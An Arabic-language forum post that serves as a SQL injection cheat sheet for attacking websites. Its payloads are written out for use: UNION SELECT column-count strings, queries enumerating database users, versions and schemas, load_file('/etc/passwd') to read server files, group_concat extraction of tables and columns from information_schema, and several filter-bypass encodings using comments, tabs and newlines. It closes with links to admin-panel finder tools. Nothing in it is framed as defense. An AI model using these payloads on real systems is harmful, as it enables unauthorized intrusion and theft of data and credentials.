Mr.Taha
المدير العام
عدد المساهمات : 236
نقاط التميز : 647
العمر : 31
الجنس : 
البلد : 
 |  موضوع: الأوامر التي تستخدم في الحقن  الأحد أغسطس 14, 2011 1:17 pm | |
| اليوم حبيت أضع الأوامر التي تستخدم في الحقن
مع شرح
عدد الأعمدة لتسهيل الحقن
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,
24,25,26,27,28,29,30,31
,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49
,50,51,52,53,54,55,56,57,58,59
,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77
,78,79,80,81,82,83,84,85,86,87
,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,1 03,104
,105,106,107,108,109,110,111
,112,113,114,115,116,117,118,119,120,121,122,123,1 24,125
,126,127,128,129,130,131,132
,133,134,135,136,137,138,139,140,141,142,143,144,1 45
,146,147,148,149,150,151,152,153
,154,155,156,157,158,159,160,161,162,163,164,165
,166,167,168,169,170,171,172,173,174
,175,176,177,178,179,180,181,182,183,184,185,186
,187,188,189,190,191,192,193,194,195
,196,197,198,199,200,201,202,203,204,205,206,207
,208,209,210,211,212,213,214,215,216
,217,218,219,220,221,222,223,224,225,226,227,228
,229,230,231,232,233,234,235,236,237
,238,239,240,241,242,243,244,245,246,247,248,249,2 50
,251,252,253,254,255,256,257,258
,259,260,261,262,263,264,265,266,267,268,269,270,2 71
,272,273,274,275,276,277,278,279
,280,281,282,283,284,285,286,287,288,289,290,291,2 92,
293,294,295,296,297,298,299,300
################################################## ############################
user() :لمعرفة مستخدم قاعدة البيانات يساعدك في التخمين على PhpMyAdmin
version() : معرفة الاصدار 4 أو 5
database() : اسم القاعدة
@@datadir :مكان تواجد قاعدة البيانات
load_file('/etc/passwd') : لقراءة ملف المستخدمين لسيرفر و هي تكون فعالة في 30% من الحالات حسب تقديري الخاص بشرط يكون magic quotes=OFF
concat(user(),0x3c62723e,@@version,0x3c62723e,data base())
أمر استخراج القاعدة و اليوزر و نسخة القاعدة
################################################## ##############################
+order+by+ : معرفة عدد الأعمدة
+union+select+ : دالة الربط لتطبيق الأوامر
############################################
أوامر استخراج الجداول
concat(table_name,0x3a3a,column_name,0x3a3a,table_ schema)
concat_ws(0x3a3a3a,table_name,column_name)
concat(column_name,0x3a,table_schema,0x2e,table_na me)
أوامر استخراج الجداول والأعمدة التي تبدأ لكلمة مثل user admin
وتكتب بين قوسي CHAR ويتم يشفيرها قبل ذلك
group_concat(column_name,0x3a,table_schema,0x2e,ta ble_name)+from+information_schema.columns+where+co lumn_name+like+char()
أمر التنقل بين المعلومات المستخرجة يعني لو أنت تحقن موقع فيه أكثر من ييزر هذا الأمر يسمح لك باستخراجهم واحدا واحدا
كهذه الطريقة limit+2,2+offset+ ... limit+1+offset+ limit+1+offset+ ....
limit+1+offset+
union+all+select+ دالة الربط لتطبيق الأوامر ويسمح لك بالتخطي بعض الفلترات
بعد طرق تخطي الفلترة
hex(unhex()
AES_ENCRYPT()
AES_ENCRYPT().
UnIOn+AlL+SeLEcT
/**/UNION/**/SELECT(/**/1,2,3,(concat_ws(0x3a,table_schema,table_name,colu
mn_name)
,5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS)/**/LIMIT/**/180,1
/**/UNION/**/SELECT/**/1,2,3,CONVERT(concat_ws(0x3a,table_schema,table_na
me,column_name) USING
latin1),5,6,7,8,9,10,11,12,13/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/LIMIT/**/180,1/*
/ ** / UNION / ** / select / ** / 1,2,3, unhex (hex (CONCAT_WS (0x3A,
table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 / ** /
from / ** / INFORMATION_SCHEMA.COLUMNS / ** / LIMIT / ** / 180,1 / *
/*--*/ UNION/*--*/ select /*--*/ 1,2,3, unhex (hex (CONCAT_WS (0x3A,
table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/
from /*--*/ INFORMATION_SCHEMA.COLUMNS/*--*/LIMIT /*--*/ 180,1 / *
+ UNION+ select + 1,2,3, unhex (hex (CONCAT_WS (0x3A, table_schema,
table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 /*--*/ from +
INFORMATION_SCHEMA.COLUMNS+LIMIT + 180,1
%09 UNION%09 select %09 1,2,3, unhex (hex (CONCAT_WS (0x3A,
table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %09
from %09 INFORMATION_SCHEMA.COLUMNS%09 LIMIT %09 180,1
%0A UNION%09 select %0A 1,2,3, unhex (hex (CONCAT_WS (0x3A,
table_schema, table_name, column_name))), 5,6,7,8,9,10,11 , 12,13 %0A
from %0A INFORMATION_SCHEMA.COLUMNS %0A LIMIT %0A 180,1
################################################## ################################################## ####
مواقع تخمين لوحات التحكم
http://flashcrew.in/t00ls/admin/
http://revtan.site40.net/admin/
http://mavia-haxx0r.co.tv/admin
http://mhg-ks.org/web/tools/@x=findl0ginp4g3.html
| |
|
